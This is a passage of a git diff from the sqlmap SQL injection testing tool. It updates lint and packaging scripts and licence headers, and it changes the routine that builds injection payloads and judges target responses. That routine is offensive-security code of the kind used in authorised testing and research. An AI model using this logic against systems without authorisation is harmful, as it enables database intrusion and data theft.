find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec pep8 '{}' \;
|
|
||||||
0
extra/shutils/postcommit-hook.sh
Normal file → Executable file
0
extra/shutils/postcommit-hook.sh
Normal file → Executable file
0
extra/shutils/precommit-hook.sh
Normal file → Executable file
0
extra/shutils/precommit-hook.sh
Normal file → Executable file
7
extra/shutils/pycodestyle.sh
Executable file
7
extra/shutils/pycodestyle.sh
Executable file
@@ -0,0 +1,7 @@
|
|||||||
|
#!/bin/bash
|
||||||
|
|
||||||
|
# Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
|
# See the file 'LICENSE' for copying permission
|
||||||
|
|
||||||
|
# Runs pycodestyle on all python files (prerequisite: pip install pycodestyle)
|
||||||
|
find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec pycodestyle --ignore=E501,E302,E305,E722,E402 '{}' \;
|
||||||
2
extra/shutils/pydiatra.sh
Normal file → Executable file
2
extra/shutils/pydiatra.sh
Normal file → Executable file
@@ -1,7 +1,7 @@
|
|||||||
#!/bin/bash
|
#!/bin/bash
|
||||||
|
|
||||||
# Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
# Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
||||||
# See the file 'doc/COPYING' for copying permission
|
# See the file 'LICENSE' for copying permission
|
||||||
|
|
||||||
# Runs py2diatra on all python files (prerequisite: pip install pydiatra)
|
# Runs py2diatra on all python files (prerequisite: pip install pydiatra)
|
||||||
find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec py2diatra '{}' \; | grep -v bare-except
|
find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec py2diatra '{}' \; | grep -v bare-except
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
#!/bin/bash
|
#!/bin/bash
|
||||||
|
|
||||||
# Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
# Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
||||||
# See the file 'doc/COPYING' for copying permission
|
# See the file 'LICENSE' for copying permission
|
||||||
|
|
||||||
# Runs pyflakes on all python files (prerequisite: apt-get install pyflakes)
|
# Runs pyflakes on all python files (prerequisite: apt-get install pyflakes)
|
||||||
find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec pyflakes '{}' \;
|
find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec pyflakes '{}' \;
|
||||||
|
|||||||
4
extra/shutils/pylint.py
Normal file → Executable file
4
extra/shutils/pylint.py
Normal file → Executable file
@@ -20,11 +20,11 @@ def check(module):
|
|||||||
print "CHECKING ", module
|
print "CHECKING ", module
|
||||||
pout = os.popen("pylint --rcfile=/dev/null %s" % module, 'r')
|
pout = os.popen("pylint --rcfile=/dev/null %s" % module, 'r')
|
||||||
for line in pout:
|
for line in pout:
|
||||||
if re.match("\AE:", line):
|
if re.match(r"\AE:", line):
|
||||||
print line.strip()
|
print line.strip()
|
||||||
if __RATING__ and "Your code has been rated at" in line:
|
if __RATING__ and "Your code has been rated at" in line:
|
||||||
print line
|
print line
|
||||||
score = re.findall("\d.\d\d", line)[0]
|
score = re.findall(r"\d.\d\d", line)[0]
|
||||||
total += float(score)
|
total += float(score)
|
||||||
count += 1
|
count += 1
|
||||||
|
|
||||||
|
|||||||
15
extra/shutils/pypi.sh
Normal file → Executable file
15
extra/shutils/pypi.sh
Normal file → Executable file
@@ -1,5 +1,10 @@
|
|||||||
#!/bin/bash
|
#!/bin/bash
|
||||||
|
|
||||||
|
if [ ! -f ~/.pypirc ]; then
|
||||||
|
echo "File ~/.pypirc is missing"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
declare -x SCRIPTPATH="${0}"
|
declare -x SCRIPTPATH="${0}"
|
||||||
SETTINGS="${SCRIPTPATH%/*}/../../lib/core/settings.py"
|
SETTINGS="${SCRIPTPATH%/*}/../../lib/core/settings.py"
|
||||||
VERSION=$(cat $SETTINGS | grep -E "^VERSION =" | cut -d '"' -f 2 | cut -d '.' -f 1-3)
|
VERSION=$(cat $SETTINGS | grep -E "^VERSION =" | cut -d '"' -f 2 | cut -d '.' -f 1-3)
|
||||||
@@ -11,8 +16,8 @@ cat > $TMP_DIR/setup.py << EOF
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
from setuptools import setup, find_packages
|
from setuptools import setup, find_packages
|
||||||
@@ -55,8 +60,8 @@ cat > sqlmap/__init__.py << EOF
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import os
|
import os
|
||||||
@@ -156,7 +161,7 @@ Links
|
|||||||
.. |Python 2.6|2.7| image:: https://img.shields.io/badge/python-2.6|2.7-yellow.svg
|
.. |Python 2.6|2.7| image:: https://img.shields.io/badge/python-2.6|2.7-yellow.svg
|
||||||
:target: https://www.python.org/
|
:target: https://www.python.org/
|
||||||
.. |License| image:: https://img.shields.io/badge/license-GPLv2-red.svg
|
.. |License| image:: https://img.shields.io/badge/license-GPLv2-red.svg
|
||||||
:target: https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING
|
:target: https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE
|
||||||
.. |Twitter| image:: https://img.shields.io/badge/twitter-@sqlmap-blue.svg
|
.. |Twitter| image:: https://img.shields.io/badge/twitter-@sqlmap-blue.svg
|
||||||
:target: https://twitter.com/sqlmap
|
:target: https://twitter.com/sqlmap
|
||||||
|
|
||||||
|
|||||||
8
extra/shutils/regressiontest.py
Normal file → Executable file
8
extra/shutils/regressiontest.py
Normal file → Executable file
@@ -1,7 +1,7 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
# Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
# Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
# See the file 'doc/COPYING' for copying permission
|
# See the file 'LICENSE' for copying permission
|
||||||
|
|
||||||
import codecs
|
import codecs
|
||||||
import inspect
|
import inspect
|
||||||
@@ -27,7 +27,7 @@ SMTP_SERVER = "127.0.0.1"
|
|||||||
SMTP_PORT = 25
|
SMTP_PORT = 25
|
||||||
SMTP_TIMEOUT = 30
|
SMTP_TIMEOUT = 30
|
||||||
FROM = "regressiontest@sqlmap.org"
|
FROM = "regressiontest@sqlmap.org"
|
||||||
#TO = "dev@sqlmap.org"
|
# TO = "dev@sqlmap.org"
|
||||||
TO = ["bernardo.damele@gmail.com", "miroslav.stampar@gmail.com"]
|
TO = ["bernardo.damele@gmail.com", "miroslav.stampar@gmail.com"]
|
||||||
SUBJECT = "regression test started on %s using revision %s" % (START_TIME, getRevisionNumber())
|
SUBJECT = "regression test started on %s using revision %s" % (START_TIME, getRevisionNumber())
|
||||||
TARGET = "debian"
|
TARGET = "debian"
|
||||||
@@ -83,7 +83,7 @@ def main():
|
|||||||
if stderr:
|
if stderr:
|
||||||
failure_email("Execution of regression test failed with error:\n\n%s" % stderr)
|
failure_email("Execution of regression test failed with error:\n\n%s" % stderr)
|
||||||
|
|
||||||
failed_tests = re.findall("running live test case: (.+?) \((\d+)\/\d+\)[\r]*\n.+test failed (at parsing items: (.+))?\s*\- scan folder: (\/.+) \- traceback: (.*?)( - SQL injection not detected)?[\r]*\n", stdout)
|
failed_tests = re.findall(r"running live test case: (.+?) \((\d+)\/\d+\)[\r]*\n.+test failed (at parsing items: (.+))?\s*\- scan folder: (\/.+) \- traceback: (.*?)( - SQL injection not detected)?[\r]*\n", stdout)
|
||||||
|
|
||||||
for failed_test in failed_tests:
|
for failed_test in failed_tests:
|
||||||
title = failed_test[0]
|
title = failed_test[0]
|
||||||
|
|||||||
0
extra/shutils/strip.sh
Normal file → Executable file
0
extra/shutils/strip.sh
Normal file → Executable file
@@ -1,8 +1,8 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
pass
|
pass
|
||||||
|
|||||||
@@ -1,8 +1,8 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import cookielib
|
import cookielib
|
||||||
|
|||||||
@@ -1,8 +1,8 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
pass
|
pass
|
||||||
|
|||||||
@@ -1,8 +1,8 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
pass
|
pass
|
||||||
|
|||||||
@@ -1,8 +1,8 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
from lib.controller.handler import setHandler
|
from lib.controller.handler import setHandler
|
||||||
|
|||||||
@@ -1,12 +1,13 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import copy
|
import copy
|
||||||
import httplib
|
import httplib
|
||||||
|
import logging
|
||||||
import os
|
import os
|
||||||
import random
|
import random
|
||||||
import re
|
import re
|
||||||
@@ -42,9 +43,11 @@ from lib.core.common import readInput
|
|||||||
from lib.core.common import showStaticWords
|
from lib.core.common import showStaticWords
|
||||||
from lib.core.common import singleTimeLogMessage
|
from lib.core.common import singleTimeLogMessage
|
||||||
from lib.core.common import singleTimeWarnMessage
|
from lib.core.common import singleTimeWarnMessage
|
||||||
|
from lib.core.common import unArrayizeValue
|
||||||
from lib.core.common import urlencode
|
from lib.core.common import urlencode
|
||||||
from lib.core.common import wasLastResponseDBMSError
|
from lib.core.common import wasLastResponseDBMSError
|
||||||
from lib.core.common import wasLastResponseHTTPError
|
from lib.core.common import wasLastResponseHTTPError
|
||||||
|
from lib.core.convert import unicodeencode
|
||||||
from lib.core.defaults import defaults
|
from lib.core.defaults import defaults
|
||||||
from lib.core.data import conf
|
from lib.core.data import conf
|
||||||
from lib.core.data import kb
|
from lib.core.data import kb
|
||||||
@@ -52,6 +55,7 @@ from lib.core.data import logger
|
|||||||
from lib.core.datatype import AttribDict
|
from lib.core.datatype import AttribDict
|
||||||
from lib.core.datatype import InjectionDict
|
from lib.core.datatype import InjectionDict
|
||||||
from lib.core.decorators import cachedmethod
|
from lib.core.decorators import cachedmethod
|
||||||
|
from lib.core.decorators import stackedmethod
|
||||||
from lib.core.dicts import FROM_DUMMY_TABLE
|
from lib.core.dicts import FROM_DUMMY_TABLE
|
||||||
from lib.core.enums import DBMS
|
from lib.core.enums import DBMS
|
||||||
from lib.core.enums import HASHDB_KEYS
|
from lib.core.enums import HASHDB_KEYS
|
||||||
@@ -73,6 +77,7 @@ from lib.core.settings import CANDIDATE_SENTENCE_MIN_LENGTH
|
|||||||
from lib.core.settings import CHECK_INTERNET_ADDRESS
|
from lib.core.settings import CHECK_INTERNET_ADDRESS
|
||||||
from lib.core.settings import CHECK_INTERNET_VALUE
|
from lib.core.settings import CHECK_INTERNET_VALUE
|
||||||
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
|
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
|
||||||
|
from lib.core.settings import DEV_EMAIL_ADDRESS
|
||||||
from lib.core.settings import DUMMY_NON_SQLI_CHECK_APPENDIX
|
from lib.core.settings import DUMMY_NON_SQLI_CHECK_APPENDIX
|
||||||
from lib.core.settings import FI_ERROR_REGEX
|
from lib.core.settings import FI_ERROR_REGEX
|
||||||
from lib.core.settings import FORMAT_EXCEPTION_STRINGS
|
from lib.core.settings import FORMAT_EXCEPTION_STRINGS
|
||||||
@@ -107,6 +112,9 @@ def checkSqlInjection(place, parameter, value):
|
|||||||
if value.isdigit():
|
if value.isdigit():
|
||||||
kb.cache.intBoundaries = kb.cache.intBoundaries or sorted(copy.deepcopy(conf.boundaries), key=lambda boundary: any(_ in (boundary.prefix or "") or _ in (boundary.suffix or "") for _ in ('"', '\'')))
|
kb.cache.intBoundaries = kb.cache.intBoundaries or sorted(copy.deepcopy(conf.boundaries), key=lambda boundary: any(_ in (boundary.prefix or "") or _ in (boundary.suffix or "") for _ in ('"', '\'')))
|
||||||
boundaries = kb.cache.intBoundaries
|
boundaries = kb.cache.intBoundaries
|
||||||
|
elif value.isalpha():
|
||||||
|
kb.cache.alphaBoundaries = kb.cache.alphaBoundaries or sorted(copy.deepcopy(conf.boundaries), key=lambda boundary: not any(_ in (boundary.prefix or "") or _ in (boundary.suffix or "") for _ in ('"', '\'')))
|
||||||
|
boundaries = kb.cache.alphaBoundaries
|
||||||
else:
|
else:
|
||||||
boundaries = conf.boundaries
|
boundaries = conf.boundaries
|
||||||
|
|
||||||
@@ -140,8 +148,7 @@ def checkSqlInjection(place, parameter, value):
|
|||||||
# error message, simple heuristic check or via DBMS-specific
|
# error message, simple heuristic check or via DBMS-specific
|
||||||
# payload), ask the user to limit the tests to the fingerprinted
|
# payload), ask the user to limit the tests to the fingerprinted
|
||||||
# DBMS
|
# DBMS
|
||||||
if kb.reduceTests is None and not conf.testFilter and (intersect(Backend.getErrorParsedDBMSes(), \
|
if kb.reduceTests is None and not conf.testFilter and (intersect(Backend.getErrorParsedDBMSes(), SUPPORTED_DBMS, True) or kb.heuristicDbms or injection.dbms):
|
||||||
SUPPORTED_DBMS, True) or kb.heuristicDbms or injection.dbms):
|
|
||||||
msg = "it looks like the back-end DBMS is '%s'. " % (Format.getErrorParsedDBMSes() or kb.heuristicDbms or injection.dbms)
|
msg = "it looks like the back-end DBMS is '%s'. " % (Format.getErrorParsedDBMSes() or kb.heuristicDbms or injection.dbms)
|
||||||
msg += "Do you want to skip test payloads specific for other DBMSes? [Y/n]"
|
msg += "Do you want to skip test payloads specific for other DBMSes? [Y/n]"
|
||||||
kb.reduceTests = (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms]) if readInput(msg, default='Y', boolean=True) else []
|
kb.reduceTests = (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms]) if readInput(msg, default='Y', boolean=True) else []
|
||||||
@@ -150,9 +157,7 @@ def checkSqlInjection(place, parameter, value):
|
|||||||
# message, via simple heuristic check or via DBMS-specific
|
# message, via simple heuristic check or via DBMS-specific
|
||||||
# payload), ask the user to extend the tests to all DBMS-specific,
|
# payload), ask the user to extend the tests to all DBMS-specific,
|
||||||
# regardless of --level and --risk values provided
|
# regardless of --level and --risk values provided
|
||||||
if kb.extendTests is None and not conf.testFilter and (conf.level < 5 or conf.risk < 3) \
|
if kb.extendTests is None and not conf.testFilter and (conf.level < 5 or conf.risk < 3) and (intersect(Backend.getErrorParsedDBMSes(), SUPPORTED_DBMS, True) or kb.heuristicDbms or injection.dbms):
|
||||||
and (intersect(Backend.getErrorParsedDBMSes(), SUPPORTED_DBMS, True) or \
|
|
||||||
kb.heuristicDbms or injection.dbms):
|
|
||||||
msg = "for the remaining tests, do you want to include all tests "
|
msg = "for the remaining tests, do you want to include all tests "
|
||||||
msg += "for '%s' extending provided " % (Format.getErrorParsedDBMSes() or kb.heuristicDbms or injection.dbms)
|
msg += "for '%s' extending provided " % (Format.getErrorParsedDBMSes() or kb.heuristicDbms or injection.dbms)
|
||||||
msg += "level (%d)" % conf.level if conf.level < 5 else ""
|
msg += "level (%d)" % conf.level if conf.level < 5 else ""
|
||||||
@@ -200,7 +205,7 @@ def checkSqlInjection(place, parameter, value):
|
|||||||
continue
|
continue
|
||||||
|
|
||||||
match = re.search(r"(\d+)-(\d+)", test.request.columns)
|
match = re.search(r"(\d+)-(\d+)", test.request.columns)
|
||||||
if injection.data and match:
|
if match and injection.data:
|
||||||
lower, upper = int(match.group(1)), int(match.group(2))
|
lower, upper = int(match.group(1)), int(match.group(2))
|
||||||
for _ in (lower, upper):
|
for _ in (lower, upper):
|
||||||
if _ > 1:
|
if _ > 1:
|
||||||
@@ -236,9 +241,7 @@ def checkSqlInjection(place, parameter, value):
|
|||||||
|
|
||||||
# Skip tests if title, vector or DBMS is not included by the
|
# Skip tests if title, vector or DBMS is not included by the
|
||||||
# given test filter
|
# given test filter
|
||||||
if conf.testFilter and not any(conf.testFilter in str(item) or \
|
if conf.testFilter and not any(conf.testFilter in str(item) or re.search(conf.testFilter, str(item), re.I) for item in (test.title, test.vector, payloadDbms)):
|
||||||
re.search(conf.testFilter, str(item), re.I) for item in \
|
|
||||||
(test.title, test.vector, payloadDbms)):
|
|
||||||
debugMsg = "skipping test '%s' because its " % title
|
debugMsg = "skipping test '%s' because its " % title
|
||||||
debugMsg += "name/vector/DBMS is not included by the given filter"
|
debugMsg += "name/vector/DBMS is not included by the given filter"
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
@@ -246,9 +249,7 @@ def checkSqlInjection(place, parameter, value):
|
|||||||
|
|
||||||
# Skip tests if title, vector or DBMS is included by the
|
# Skip tests if title, vector or DBMS is included by the
|
||||||
# given skip filter
|
# given skip filter
|
||||||
if conf.testSkip and any(conf.testSkip in str(item) or \
|
if conf.testSkip and any(conf.testSkip in str(item) or re.search(conf.testSkip, str(item), re.I) for item in (test.title, test.vector, payloadDbms)):
|
||||||
re.search(conf.testSkip, str(item), re.I) for item in \
|
|
||||||
(test.title, test.vector, payloadDbms)):
|
|
||||||
debugMsg = "skipping test '%s' because its " % title
|
debugMsg = "skipping test '%s' because its " % title
|
||||||
debugMsg += "name/vector/DBMS is included by the given skip filter"
|
debugMsg += "name/vector/DBMS is included by the given skip filter"
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
@@ -257,26 +258,32 @@ def checkSqlInjection(place, parameter, value):
|
|||||||
if payloadDbms is not None:
|
if payloadDbms is not None:
|
||||||
# Skip DBMS-specific test if it does not match the user's
|
# Skip DBMS-specific test if it does not match the user's
|
||||||
# provided DBMS
|
# provided DBMS
|
||||||
if conf.dbms is not None and not intersect(payloadDbms, conf.dbms, True):
|
if conf.dbms and not intersect(payloadDbms, conf.dbms, True):
|
||||||
debugMsg = "skipping test '%s' because " % title
|
debugMsg = "skipping test '%s' because " % title
|
||||||
debugMsg += "the provided DBMS is %s" % conf.dbms
|
debugMsg += "its declared DBMS is different than provided"
|
||||||
|
logger.debug(debugMsg)
|
||||||
|
continue
|
||||||
|
|
||||||
|
if kb.dbmsFilter and not intersect(payloadDbms, kb.dbmsFilter, True):
|
||||||
|
debugMsg = "skipping test '%s' because " % title
|
||||||
|
debugMsg += "its declared DBMS is different than provided"
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
continue
|
continue
|
||||||
|
|
||||||
# Skip DBMS-specific test if it does not match the
|
# Skip DBMS-specific test if it does not match the
|
||||||
# previously identified DBMS (via DBMS-specific payload)
|
# previously identified DBMS (via DBMS-specific payload)
|
||||||
if injection.dbms is not None and not intersect(payloadDbms, injection.dbms, True):
|
if injection.dbms and not intersect(payloadDbms, injection.dbms, True):
|
||||||
debugMsg = "skipping test '%s' because the identified " % title
|
debugMsg = "skipping test '%s' because " % title
|
||||||
debugMsg += "back-end DBMS is %s" % injection.dbms
|
debugMsg += "its declared DBMS is different than identified"
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
continue
|
continue
|
||||||
|
|
||||||
# Skip DBMS-specific test if it does not match the
|
# Skip DBMS-specific test if it does not match the
|
||||||
# previously identified DBMS (via DBMS-specific error message)
|
# previously identified DBMS (via DBMS-specific error message)
|
||||||
if kb.reduceTests and not intersect(payloadDbms, kb.reduceTests, True):
|
if kb.reduceTests and not intersect(payloadDbms, kb.reduceTests, True):
|
||||||
debugMsg = "skipping test '%s' because the parsed " % title
|
debugMsg = "skipping test '%s' because the heuristic " % title
|
||||||
debugMsg += "error message(s) showed that the back-end DBMS "
|
debugMsg += "tests showed that the back-end DBMS "
|
||||||
debugMsg += "could be %s" % Format.getErrorParsedDBMSes()
|
debugMsg += "could be '%s'" % unArrayizeValue(kb.reduceTests)
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
continue
|
continue
|
||||||
|
|
||||||
@@ -324,6 +331,23 @@ def checkSqlInjection(place, parameter, value):
|
|||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
continue
|
continue
|
||||||
|
|
||||||
|
if stype == PAYLOAD.TECHNIQUE.UNION:
|
||||||
|
match = re.search(r"(\d+)-(\d+)", test.request.columns)
|
||||||
|
if match and not injection.data:
|
||||||
|
_ = test.request.columns.split('-')[-1]
|
||||||
|
if conf.uCols is None and _.isdigit() and int(_) > 10:
|
||||||
|
if kb.futileUnion is None:
|
||||||
|
msg = "it is not recommended to perform "
|
||||||
|
msg += "extended UNION tests if there is not "
|
||||||
|
msg += "at least one other (potential) "
|
||||||
|
msg += "technique found. Do you want to skip? [Y/n] "
|
||||||
|
kb.futileUnion = not readInput(msg, default='Y', boolean=True)
|
||||||
|
|
||||||
|
if kb.futileUnion is False:
|
||||||
|
debugMsg = "skipping test '%s'" % title
|
||||||
|
logger.debug(debugMsg)
|
||||||
|
continue
|
||||||
|
|
||||||
infoMsg = "testing '%s'" % title
|
infoMsg = "testing '%s'" % title
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
@@ -409,7 +433,7 @@ def checkSqlInjection(place, parameter, value):
|
|||||||
|
|
||||||
if conf.invalidLogical:
|
if conf.invalidLogical:
|
||||||
_ = int(kb.data.randomInt[:2])
|
_ = int(kb.data.randomInt[:2])
|
||||||
origValue = "%s AND %s=%s" % (value, _, _ + 1)
|
origValue = "%s AND %s LIKE %s" % (value, _, _ + 1)
|
||||||
elif conf.invalidBignum:
|
elif conf.invalidBignum:
|
||||||
origValue = kb.data.randomInt[:6]
|
origValue = kb.data.randomInt[:6]
|
||||||
elif conf.invalidString:
|
elif conf.invalidString:
|
||||||
@@ -430,11 +454,13 @@ def checkSqlInjection(place, parameter, value):
|
|||||||
boundPayload = agent.prefixQuery(fstPayload, prefix, where, clause)
|
boundPayload = agent.prefixQuery(fstPayload, prefix, where, clause)
|
||||||
boundPayload = agent.suffixQuery(boundPayload, comment, suffix, where)
|
boundPayload = agent.suffixQuery(boundPayload, comment, suffix, where)
|
||||||
reqPayload = agent.payload(place, parameter, newValue=boundPayload, where=where)
|
reqPayload = agent.payload(place, parameter, newValue=boundPayload, where=where)
|
||||||
|
|
||||||
if reqPayload:
|
if reqPayload:
|
||||||
if reqPayload in seenPayload:
|
stripPayload = re.sub(r"(\A|\b|_)([A-Za-z]{4}((?<!LIKE))|\d+)(_|\b|\Z)", r"\g<1>.\g<4>", reqPayload)
|
||||||
|
if stripPayload in seenPayload:
|
||||||
continue
|
continue
|
||||||
else:
|
else:
|
||||||
seenPayload.add(reqPayload)
|
seenPayload.add(stripPayload)
|
||||||
else:
|
else:
|
||||||
reqPayload = None
|
reqPayload = None
|
||||||
|
|
||||||
@@ -486,12 +512,16 @@ def checkSqlInjection(place, parameter, value):
|
|||||||
errorResult = Request.queryPage(errorPayload, place, raise404=False)
|
errorResult = Request.queryPage(errorPayload, place, raise404=False)
|
||||||
if errorResult:
|
if errorResult:
|
||||||
continue
|
continue
|
||||||
elif not any((conf.string, conf.notString, conf.regexp, conf.code, kb.nullConnection)):
|
elif kb.heuristicPage and not any((conf.string, conf.notString, conf.regexp, conf.code, kb.nullConnection)):
|
||||||
_ = comparison(kb.heuristicPage, None, getRatioValue=True)
|
_ = comparison(kb.heuristicPage, None, getRatioValue=True)
|
||||||
if _ > kb.matchRatio:
|
if _ > kb.matchRatio:
|
||||||
kb.matchRatio = _
|
kb.matchRatio = _
|
||||||
logger.debug("adjusting match ratio for current parameter to %.3f" % kb.matchRatio)
|
logger.debug("adjusting match ratio for current parameter to %.3f" % kb.matchRatio)
|
||||||
|
|
||||||
|
# Reducing false-positive "appears" messages in heavily dynamic environment
|
||||||
|
if kb.heavilyDynamic and not Request.queryPage(reqPayload, place, raise404=False):
|
||||||
|
continue
|
||||||
|
|
||||||
injectable = True
|
injectable = True
|
||||||
|
|
||||||
elif threadData.lastComparisonRatio > UPPER_RATIO_BOUND and not any((conf.string, conf.notString, conf.regexp, conf.code, kb.nullConnection)):
|
elif threadData.lastComparisonRatio > UPPER_RATIO_BOUND and not any((conf.string, conf.notString, conf.regexp, conf.code, kb.nullConnection)):
|
||||||
@@ -499,8 +529,13 @@ def checkSqlInjection(place, parameter, value):
|
|||||||
trueSet = set(getFilteredPageContent(truePage, True, "\n").split("\n"))
|
trueSet = set(getFilteredPageContent(truePage, True, "\n").split("\n"))
|
||||||
falseSet = set(getFilteredPageContent(falsePage, True, "\n").split("\n"))
|
falseSet = set(getFilteredPageContent(falsePage, True, "\n").split("\n"))
|
||||||
|
|
||||||
|
if threadData.lastErrorPage and threadData.lastErrorPage[1]:
|
||||||
|
errorSet = set(getFilteredPageContent(threadData.lastErrorPage[1], True, "\n").split("\n"))
|
||||||
|
else:
|
||||||
|
errorSet = set()
|
||||||
|
|
||||||
if originalSet == trueSet != falseSet:
|
if originalSet == trueSet != falseSet:
|
||||||
candidates = trueSet - falseSet
|
candidates = trueSet - falseSet - errorSet
|
||||||
|
|
||||||
if candidates:
|
if candidates:
|
||||||
candidates = sorted(candidates, key=lambda _: len(_))
|
candidates = sorted(candidates, key=lambda _: len(_))
|
||||||
@@ -523,12 +558,18 @@ def checkSqlInjection(place, parameter, value):
|
|||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
else:
|
else:
|
||||||
trueSet = set(extractTextTagContent(trueRawResponse))
|
trueSet = set(extractTextTagContent(trueRawResponse))
|
||||||
trueSet = trueSet.union(__ for _ in trueSet for __ in _.split())
|
trueSet |= set(__ for _ in trueSet for __ in _.split())
|
||||||
|
|
||||||
falseSet = set(extractTextTagContent(falseRawResponse))
|
falseSet = set(extractTextTagContent(falseRawResponse))
|
||||||
falseSet = falseSet.union(__ for _ in falseSet for __ in _.split())
|
falseSet |= set(__ for _ in falseSet for __ in _.split())
|
||||||
|
|
||||||
candidates = filter(None, (_.strip() if _.strip() in trueRawResponse and _.strip() not in falseRawResponse else None for _ in (trueSet - falseSet)))
|
if threadData.lastErrorPage and threadData.lastErrorPage[1]:
|
||||||
|
errorSet = set(extractTextTagContent(threadData.lastErrorPage[1]))
|
||||||
|
errorSet |= set(__ for _ in errorSet for __ in _.split())
|
||||||
|
else:
|
||||||
|
errorSet = set()
|
||||||
|
|
||||||
|
candidates = filter(None, (_.strip() if _.strip() in trueRawResponse and _.strip() not in falseRawResponse else None for _ in (trueSet - falseSet - errorSet)))
|
||||||
|
|
||||||
if candidates:
|
if candidates:
|
||||||
candidates = sorted(candidates, key=lambda _: len(_))
|
candidates = sorted(candidates, key=lambda _: len(_))
|
||||||
@@ -565,10 +606,10 @@ def checkSqlInjection(place, parameter, value):
|
|||||||
# body for the test's <grep> regular expression
|
# body for the test's <grep> regular expression
|
||||||
try:
|
try:
|
||||||
page, headers, _ = Request.queryPage(reqPayload, place, content=True, raise404=False)
|
page, headers, _ = Request.queryPage(reqPayload, place, content=True, raise404=False)
|
||||||
output = extractRegexResult(check, page, re.DOTALL | re.IGNORECASE) \
|
output = extractRegexResult(check, page, re.DOTALL | re.IGNORECASE)
|
||||||
or extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None, re.DOTALL | re.IGNORECASE) \
|
